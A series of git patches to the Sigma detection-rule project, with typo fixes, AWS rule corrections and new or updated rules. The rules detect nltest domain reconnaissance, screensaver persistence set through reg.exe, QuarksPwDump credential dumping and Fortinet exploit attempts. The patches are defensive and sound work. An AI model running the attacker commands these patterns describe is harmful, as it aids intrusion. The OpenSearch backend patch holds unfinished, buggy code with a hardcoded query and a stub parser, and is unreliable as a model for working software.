8abaaf80..d34bd849 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -344,7 +344,7 @@ class TestRules(unittest.TestCase): status_str = self.get_rule_part(file_path=file, part_name="status") if status_str: if not status_str in valid_status: - print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) + print(Fore.YELLOW + "Rule {} has a invalid 'status' (check wiki).".format(file)) faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + @@ -365,7 +365,7 @@ class TestRules(unittest.TestCase): print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) faulty_rules.append(file) elif not level_str in valid_level: - print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) + print(Fore.YELLOW + "Rule {} has a invalid 'level' (check wiki).".format(file)) faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + @@ -562,7 +562,7 @@ class TestRules(unittest.TestCase): for key in logsource: if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) - valide = False + valid = False if not valid: faulty_rules.append(file) diff --git a/tools/sigma/backends/devo.py b/tools/sigma/backends/devo.py index 3d6db147..df0dc407 100644 --- a/tools/sigma/backends/devo.py +++ b/tools/sigma/backends/devo.py @@ -40,7 +40,7 @@ class DevoBackend(SingleTextQueryBackend): mapMulti = "has(%s, %s)" # Syntax for field/value conditions. First %s is fieldname, second is value mapWildcard = "matches(%s, nameglob(%s))" # Syntax for globbing conditions mapRe = "matches(%s, %s)" # Syntax for regex conditions that already were transformed by SigmaRegularExpressionModifier - mapContains = "toktains(%s, %s, true, true)" # Systax for token value searches + mapContains = "toktains(%s, %s, true, true)" # Syntax for token value searches mapListValueExpression = "%s or %s" # Syntax for field/value condititons where map value is a list mapFullTextSearch = "weaktoktains(raw, \"%s\", true, true)" # Expression for full text searches typedValueExpression = { diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index 175f1284..f33b5f0b 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -65,7 +65,7 @@ class SigmaRuleFilter: if self.status not in self.STATES: raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond)) elif cond.startswith("tlp="): - self.tlp = cond[cond.index("=") + 1:].upper() #tlp is allways uppercase + self.tlp = cond[cond.index("=") + 1:].upper() #tlp is always uppercase elif cond.startswith("target="): self.target = cond[cond.index("=") + 1:].lower() # lower to make caseinsensitive elif cond.startswith("logsource="): diff --git a/tools/sigma/sigma-uuid.py b/tools/sigma/sigma-uuid.py index 85a9ab61..ec86a199 100755 --- a/tools/sigma/sigma-uuid.py +++ b/tools/sigma/sigma-uuid.py @@ -7,7 +7,7 @@ from uuid import uuid4, UUID import yaml from sigma.output import SigmaYAMLDumper -argparser = ArgumentParser(description="Assign and verfify UUIDs of Sigma rules") +argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose.") argparser.add_argument("--recursive", "-r", action="store_true", help="Recurse into directories.") diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 2a8b003c..9ec32b71 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -15,7 +15,7 @@ def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) def main(): - argparser = ArgumentParser(description="Assign and verfify UUIDs of Sigma rules") + argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") argparser.add_argument("--verbose", "-v", action="store_true", help="Be verbose.") argparser.add_argument("--recursive", "-r", action="store_true", help="Recurse into directories.") diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index f74944fd..350ffb86 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -114,7 +114,7 @@ def set_argparser(): available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") - argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") + argparser.add_argument("--output-extention", "-e", default=None, help="Extension of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") From 5553534d7cf884304ad39fc9ee28936bb18e6bdf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 14:29:02 -0500 Subject: [PATCH 0437/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2aeae254..424533b5 100644 --- a/README.md +++ b/README.md @@ -304,7 +304,7 @@ S2AN was developed to be used as a standalone tool or as part of a CI/CD pipelin The directory `contrib` contains scripts that were contributed by the community: -* `sigma2elastalert.py`i by David Routine: A script that converts Sigma rules to Elastalert configurations. This tool +* `sigma2elastalert.py`i by David Routin: A script that converts Sigma rules to Elastalert configurations. This tool uses *sigmac* and expects it in its path. These tools are not part of the main toolchain and maintained separately by their authors. From 92b72ffdc19128d876f178fd3e660cdd93e27215 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Wed, 18 Aug 2021 20:45:18 +0000 Subject: [PATCH 0438/1367] Update win_nltest_query.yml modification based on new reports 1.https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) -> for (selection_recon1 and seletion_recon2") 2.https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters -> nltest example 3.MITRE reference just for reference to MITRE to gain more insights 4.https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ -> new Report about Trickbot with reference and usage of "nltest" therefore I included the option in this rule --- .../process_creation/win_nltest_query.yml | 51 ++++++++++++------- 1 file changed, 34 insertions(+), 17 deletions(-) diff --git a/rules/windows/process_creation/win_nltest_query.yml b/rules/windows/process_creation/win_nltest_query.yml index b42648cc..2a095dba 100644 --- a/rules/windows/process_creation/win_nltest_query.yml +++ b/rules/windows/process_creation/win_nltest_query.yml @@ -1,24 +1,41 @@ -title: Nltest Credential Hash Theft -id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 -description: Detects nltest query commands which may leak credential hashes +title: Nltest Usage +description: Detects nltest commands that can be used for information discovery references: - - https://twitter.com/sysopfb/status/986799053668139009 - - https://github.com/LOLBAS-Project/LOLBAS/blob/94368c1e69a6ce5ce812f2b331c99b89a63791b9/yml/LOLUtilz/OSBinaries/Nltest.yml -date: 2018/04/18 -modified: 2021/01/05 -tags: - - attack.credential_access - - attack.t1003 +- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) +- https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ +- https://attack.mitre.org/techniques/T1482/ +- https://attack.mitre.org/techniques/T1016/ +- https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters status: experimental -author: Craig Young, oscd.community +author: Craig Young, oscd.community, Georg Lauenstein +date: 2021/07/24 +modified: 2021/08/17 +tags: + - attack.discovery + - attack.T1016 + - attack.T1482 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: + selection_nltest: Image|endswith: '\nltest.exe' - CommandLine|contains: '\query' - condition: selection + selection_recon1: + CommandLine|contains|all: + - '/server' + - '/query' + selection_recon2: + CommandLine|startswith: + - '/dclist:' + - '/parentdomain' + - '/domain_trusts' + - '/user' + condition: selection_nltest AND (selection_recon1 OR selection_recon2) falsepositives: - - Legitimate administration + - To be determined level: medium +fields: + - Image + - User + - CommandLine + - ParentCommandLine From 6ccff2cff512ba11177b83bd492c31d711e3f6b7 Mon Sep 17 00:00:00 2001 From: Young Date: Wed, 18 Aug 2021 18:15:18 -0700 Subject: [PATCH 0439/1367] Added support for threshold rules --- .DS_Store | Bin 8196 -> 8196 bytes tools/config/winlogbeat.yml | 2 +- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 101 +++++++++++++++++++++++++---- 4 files changed, 92 insertions(+), 13 deletions(-) diff --git a/.DS_Store b/.DS_Store index 8ec7eb62074302687bee5f8d1e0690ea3c2ceae7..b70b452d0071309beb8e844f281cb3104d236e61 100644 GIT binary patch delta 31 ecmZp1XmQx!EXrhRHhGnh%jQneUF-;UH4^};AqsH- delta 25 bcmZp1XmQx!EIN6GklW@?(Ov9NMl}-vfwBpg diff --git a/tools/config/winlogbeat.yml b/tools/config/winlogbeat.yml index d640f433..5e913928 100644 --- a/tools/config/winlogbeat.yml +++ b/tools/config/winlogbeat.yml @@ -10,7 +10,7 @@ backends: - elastalert - elastalert-dsl - ee-outliers - - os-monitor + - opensearch-monitor logsources: windows: product: windows diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 80a0c98d..04ff119a 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json @@ -1 +1 @@ -{"type": "monitor", "name": "QuarksPwDump Clearing Access History", "description": "Detects QuarksPwDump clearing access history in hive", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {" winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM* "}}, {"match": {" winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Credential Access", "T1003", "T1003.002"], "triggers": [{"name": "generated-trigger", "severity": "1", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "threat": [{"tactic": {"id": "TA0006", "reference": "https://attack.mitre.org/tactics/TA0006", "name": "Credential Access"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1003", "name": "OS Credential Dumping", "reference": "https://attack.mitre.org/techniques/T1003"}]}]}} +{"description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", "enabled": true, "false_positives": ["Software installation", "Software updates"], "filters": [], "from": "now-360s", "immutable": false, "index": ["winlogbeat-*"], "interval": "5m", "rule_id": "b0d77106-7bb0-41fe-bd94-d1752164d066", "language": "lucene", "output_index": ".siem-signals-default", "max_signals": 100, "risk_score": 5, "name": "Rare Schtasks Creations", "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")", "meta": {"from": "1m"}, "severity": "low", "tags": ["Execution", "Privilege Escalation", "Persistence", "T1053", "T1053.005"], "to": "now", "type": "threshold", "threat": [{"tactic": {"id": "TA0002", "reference": "https://attack.mitre.org/tactics/TA0002", "name": "Execution"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0004", "reference": "https://attack.mitre.org/tactics/TA0004", "name": "Privilege Escalation"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0003", "reference": "https://attack.mitre.org/tactics/TA0003", "name": "Persistence"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}], "version": 1, "threshold": {"field": "winlog.event_data.TaskName", "value": 6}} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index f26b75b2..1e034800 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py @@ -21,6 +21,7 @@ import sys import os from random import randrange from distutils.util import strtobool +from typing import List, Tuple, Union from uuid import uuid4 import sigma @@ -35,6 +36,63 @@ from .exceptions import NotSupportedError from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * +class Atom: + def __init__(self, field: str, prop: str) -> None: + self.field = field + self.prop = prop + +class Group: + def __init__(self) -> None: + pass + +class Boolean: + def __init__(self, expression: Union[Atom, Group]) -> None: + self.expression = expression + +class Ary: + def __init__(self, bool1: Boolean, bool2: List[Tuple[str, Boolean]] = None) -> None: + self.bool1 = bool1 + self.bool2 = bool2 + +def group_init(self, ary:Ary): + self.ary = ary + +Group.__init__ = group_init + +def parseAtom(s: str) -> Atom: + return Atom(s.split(":")[0], s.split(":")[0]) + +def parseGroup(s: str) -> Group: + return Group(parseAry(s[1:-1])) + +def expandGroup(s: str) -> str: + field = s.strip("()").split(":")[0] + props = s.strip("()").split(":")[1].strip("()").split() + print(props) + newGroup = [] + + for index in range(len(props)): + element = props[index] + if index%2 == 0: + newGroup.append(f'{field}: {element}') + else: + newGroup.append(element) + + return "(" + "".join(newGroup) + ")" + +def parseBoolean(s: str) -> Boolean: + if not s.contains("("): + expression = parseAtom(s) + else: + if s[0] != '(': + s = expandGroup(s) + expression = parseGroup(s) + + return Boolean(expression) + +def parseAry(s: str) -> Ary: + pass + class OpenSearchBackend(object): """OpenSearch detection rule backend.""" active = True @@ -46,6 +104,7 @@ class OpenSearchBackend(object): ("dest_base_url", "https://github.com/SigmaHQ/sigma/tree/master/", "The URL prefix", None), ("custom_tag", None , "Add custom tag. for multi split with a comma tag1,tag2 ", None), ) + isThreshold = False def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -154,14 +213,27 @@ class OpenSearchBackend(object): } ] + def build_threshold(self, field, inequality, threshold): + INEQUALITIES = {"<": "lt", "<=": "lte", ">": "gt", ">=": "gte"} + + return { + "range": { + field: { + INEQUALITIES[inequality]: threshold + } + } + } + ''' Builds OpenSearch monitor query from translated Elastic Common Schema query. - Only supports must and should clauses. ''' def build_query(self, translation): - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)" # translation = "(winlog.channel:\"System\"" parsedTranslation = translation.strip("()").split("OR") + + print(f'\nExpanded group: {expandGroup("winlog.event_data.DestAddress.keyword:(127.* OR 121)")}\n') if len(parsedTranslation) == 0: return {} @@ -216,11 +288,20 @@ class OpenSearchBackend(object): # If only one type of clause, don't use nested bool object if len(clauses) > 1: - return { - "bool": { - "should": clauses + if self.isThreshold: + self.isThreshold = False + return { + "bool": { + "should": clauses, + "filter": self.rule_threshold + } + } + else: + return { + "bool": { + "should": clauses + } } - } return clauses[0] ''' @@ -390,7 +471,7 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): Backend class containing the identifier for the -t argument. Can inherit from ElasticsearchQuerystringBackend since query string in both OpenSearch monitors and ElasticRule are in Elastic Common Schema. ''' - identifier = "os-monitor" + identifier = "opensearch-monitor" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -400,9 +481,7 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): raise NotImplementedError("Threshold rules can only handle > and >= operators") if agg.aggfield: raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) - self.rule_threshold = { - "field": agg.groupfield if agg.groupfield else [], - "value": int(agg.condition) if agg.cond_op == ">=" else int(agg.condition) + 1 - } + self.isThreshold = True + self.rule_threshold = self.build_threshold(agg.groupfield, agg.cond_op, agg.condition) return "" raise NotImplementedError("Aggregation %s is not implemented for this backend" % agg.aggfunc_notrans) \ No newline at end of file From df829f0d45ee5ca6c73b15b68ef91eb7cd513126 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Thu, 19 Aug 2021 08:26:33 +0200 Subject: [PATCH 0440/1367] Update and rename win_nltest_query.yml to win_nltest_recon.yml changes based on feedback added Update and rename win_nltest_query.yml to win_nltest_recon.yml --- .../{win_nltest_query.yml => win_nltest_recon.yml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename rules/windows/process_creation/{win_nltest_query.yml => win_nltest_recon.yml} (87%) diff --git a/rules/windows/process_creation/win_nltest_query.yml b/rules/windows/process_creation/win_nltest_recon.yml similarity index 87% rename from rules/windows/process_creation/win_nltest_query.yml rename to rules/windows/process_creation/win_nltest_recon.yml index 2a095dba..f025c321 100644 --- a/rules/windows/process_creation/win_nltest_query.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -1,4 +1,5 @@ -title: Nltest Usage +title: Detect Recon Activity with nltest +id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) @@ -9,7 +10,7 @@ references: status: experimental author: Craig Young, oscd.community, Georg Lauenstein date: 2021/07/24 -modified: 2021/08/17 +modified: 2021/08/19 tags: - attack.discovery - attack.T1016 @@ -32,7 +33,7 @@ detection: - '/user' condition: selection_nltest AND (selection_recon1 OR selection_recon2) falsepositives: - - To be determined + - Legitimate administration use but user must be check out level: medium fields: - Image From 0c6db48ceb5b02893900437f1042064e3b48b2d2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 19 Aug 2021 08:27:15 +0200 Subject: [PATCH 0441/1367] Update web_fortinet_cve_2021_22123_exploit.yml --- .../web/web_fortinet_cve_2021_22123_exploit.yml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml index 42615b9d..f50aa501 100644 --- a/rules/web/web_fortinet_cve_2021_22123_exploit.yml +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml @@ -1,10 +1,11 @@ title: Fortinet CVE-2021-22123 Exploitation description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs id: f425637f-891c-4191-a6c4-3bb1b70513b4 +status: experimental references: - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection -author: Bhabesh Raj -date: 2021/08/18 +author: Bhabesh Raj, Florian Roth +date: 2021/08/19 tags: - attack.initial_access - attack.t1190 @@ -16,11 +17,12 @@ detection: - '/api/v2.0/user/remoteserver.saml' cs-method: - POST - content-type|startswith: - - 'multipart/form-data;' - content-disposition|contains: - - '`' - condition: selection + filter1: + cs-referer|contains: '/root/user/remote-user/saml-user/' + filter2: + cs-referer: + - null + condition: selection and not filter1 and not filter2 fields: - client_ip - url From 2cdab46ee4ebc013a45a7a156f96756d50592935 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 09:37:00 +0200 Subject: [PATCH 0442/1367] fix start errors --- tools/sigma/sigma_similarity.py | 3 +-- tools/sigma_similarity | 2 +- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/tools/sigma/sigma_similarity.py b/tools/sigma/sigma_similarity.py index 5167bcb5..ad911c57 100755 --- a/tools/sigma/sigma_similarity.py +++ b/tools/sigma/sigma_similarity.py @@ -68,9 +68,8 @@ def main(): if args.primary: with open(args.primary, "r") as f: primary_paths = { pathname.strip() for pathname in f.readlines() } - parsed = { - str(path): SigmaCollectionParser(path.open().read()) + str(path): SigmaCollectionParser(path.open(encoding='utf-8').read()) for path in paths } converted = { diff --git a/tools/sigma_similarity b/tools/sigma_similarity index 782531b5..94f3a30d 100755 --- a/tools/sigma_similarity +++ b/tools/sigma_similarity @@ -1,5 +1,5 @@ #!/usr/bin/env python3 -from sigma.sigmac import main +from sigma.sigma_similarity import main main() From b4a029ac3c40d2297abbf4d197ae2d4c368b3625 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 19 Aug 2021 13:55:09 +0200 Subject: [PATCH 0443/1367] Add win_susp_screensaver_reg.yml --- .../win_susp_netsh_dll_persistence.yml | 6 +-- .../win_susp_screensaver_reg.yml | 52 +++++++++++++++++++ 2 files changed, 55 insertions(+), 3 deletions(-) create mode 100644 rules/windows/process_creation/win_susp_screensaver_reg.yml diff --git a/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml b/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml index 20eaa79e..3ee75393 100644 --- a/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml +++ b/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml @@ -3,12 +3,12 @@ id: 56321594-9087-49d9-bf10-524fe8479452 description: Detects persitence via netsh helper status: test references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1128/T1128.md + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md + - https://attack.mitre.org/software/S0108/ tags: - - attack.persistence + - attack.privilege_escalation - attack.t1546.007 - attack.s0108 - - attack.t1128 # an old one date: 2019/10/25 modified: 2020/08/30 author: Victor Sergeev, oscd.community diff --git a/rules/windows/process_creation/win_susp_screensaver_reg.yml b/rules/windows/process_creation/win_susp_screensaver_reg.yml new file mode 100644 index 00000000..5d49d1c8 --- /dev/null +++ b/rules/windows/process_creation/win_susp_screensaver_reg.yml @@ -0,0 +1,52 @@ +title: Suspicious ScreenSave Change by Reg.exe +id: 0fc35fc3-efe6-4898-8a37-0b233339524f +status: experimental +author: frack113 +date: 2021/08/19 +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md + - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf +tags: + - attack.privilege_escalation + - attack.t1546.002 +logsource: + category: process_creation + product: windows +detection: + selection_reg: + Image|endswith: reg.exe + CommandLine|contains: + - 'HKEY_CURRENT_USER\Control Panel\Desktop' + - 'HKCU\Control Panel\Desktop' + selection_option_1: # /force Active ScreenSaveActive + CommandLine|contains|all: + - '/v ScreenSaveActive' + - '/t REG_SZ' + - '/d 1' + - '/f' + selection_option_2: # /force set ScreenSaveTimeout + CommandLine|contains|all: + - '/v ScreenSaveTimeout' + - '/t REG_SZ' + - '/d ' + - '/f' + selection_option_3: # /force set ScreenSaverIsSecure + CommandLine|contains|all: + - '/v ScreenSaverIsSecure' + - '/t REG_SZ' + - '/d 0' + - '/f' + selection_option_4: # /force set a .scr + CommandLine|contains|all: + - '/v SCRNSAVE.EXE' + - '/t REG_SZ' + - '/d ' + - '.scr' + - '/f' + condition: selection_reg and 1 of selection_option_* +falsepositives: + - GPO +level: medium \ No newline at end of file From bf9ac21ebcb97f5f82fc6fdd7c517433700224b4 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Thu, 19 Aug 2021 14:12:00 +0200 Subject: [PATCH 0444/1367] Update win_nltest_recon.yml change "startswith" to "contains" --- rules/windows/process_creation/win_nltest_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index f025c321..ca20c9f4 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -26,7 +26,7 @@ detection: - '/server' - '/query' selection_recon2: - CommandLine|startswith: + CommandLine|contains: - '/dclist:' - '/parentdomain' - '/domain_trusts' From 60931d09b93aa8346c17e158afb9ce6968b033dc Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 19 Aug 2021 14:24:54 +0200 Subject: [PATCH 0445/1367] fix title error --- rules/windows/process_creation/win_nltest_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index ca20c9f4..ecf2762e 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -1,4 +1,4 @@ -title: Detect Recon Activity with nltest +title: Recon Activity with NLTEST id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: From 08af3a94291a8b48063b317bdfaa78b16155dca0 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 19 Aug 2021 15:20:04 +0200 Subject: [PATCH 0446/1367] Cleanup errors --- .../windows/process_creation/win_nltest_recon.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index ecf2762e..720cc587 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -2,19 +2,19 @@ title: Recon Activity with NLTEST id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 description: Detects nltest commands that can be used for information discovery references: -- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) -- https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ -- https://attack.mitre.org/techniques/T1482/ -- https://attack.mitre.org/techniques/T1016/ -- https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11) + - https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/ + - https://attack.mitre.org/techniques/T1482/ + - https://attack.mitre.org/techniques/T1016/ + - https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters status: experimental author: Craig Young, oscd.community, Georg Lauenstein date: 2021/07/24 modified: 2021/08/19 tags: - attack.discovery - - attack.T1016 - - attack.T1482 + - attack.t1016 + - attack.t1482 logsource: category: process_creation product: windows From 67020bb0ff8a3c59b6cf205e87699eca1e08792a Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 19 Aug 2021 14:24:43 +0100 Subject: [PATCH 0447/1367] Update AWS CloudTrail rules aws_elasticache_security_group_created.yml aws_elasticache_security_group_modified_or_deleted.yml Removed spaces from eventNames aws_s3_data_management_tampering.yml Fix typo in title, use s3 as eventSource aws_snapshot_backup_exfiltration.yml Use ec2 as eventSource --- rules/cloud/aws/aws_elasticache_security_group_created.yml | 3 ++- .../aws_elasticache_security_group_modified_or_deleted.yml | 7 ++++--- rules/cloud/aws/aws_s3_data_management_tampering.yml | 5 +++-- rules/cloud/aws/aws_snapshot_backup_exfiltration.yml | 4 ++-- 4 files changed, 11 insertions(+), 8 deletions(-) diff --git a/rules/cloud/aws/aws_elasticache_security_group_created.yml b/rules/cloud/aws/aws_elasticache_security_group_created.yml index 26c08a75..5aec929c 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_created.yml @@ -4,6 +4,7 @@ description: Detects when an ElastiCache security group has been created. author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml logsource: @@ -11,7 +12,7 @@ logsource: detection: selection: eventSource: elasticache.amazonaws.com - eventName: "Create Cache Security Group" + eventName: "CreateCacheSecurityGroup" condition: selection level: low tags: diff --git a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml index 26e32527..162b7998 100644 --- a/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Identifies when an ElastiCache security group has been modified or author: Austin Songer status: experimental date: 2021/07/24 +modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml logsource: @@ -12,9 +13,9 @@ detection: selection: eventSource: elasticache.amazonaws.com eventName: - - "Delete Cache Security Group" - - "Authorize Cache Security Group Ingress" - - "Revoke Cache Security Group Ingress" + - "DeleteCacheSecurityGroup" + - "AuthorizeCacheSecurityGroupIngress" + - "RevokeCacheSecurityGroupIngress" - "AuthorizeCacheSecurityGroupEgress" - "RevokeCacheSecurityGroupEgress" condition: selection diff --git a/rules/cloud/aws/aws_s3_data_management_tampering.yml b/rules/cloud/aws/aws_s3_data_management_tampering.yml index 4787fd14..7e5229d1 100644 --- a/rules/cloud/aws/aws_s3_data_management_tampering.yml +++ b/rules/cloud/aws/aws_s3_data_management_tampering.yml @@ -1,9 +1,10 @@ -title: AWS S3 Data Management Tamperin +title: AWS S3 Data Management Tampering id: 78b3756a-7804-4ef7-8555-7b9024a02e2d description: Detects when a user tampers with 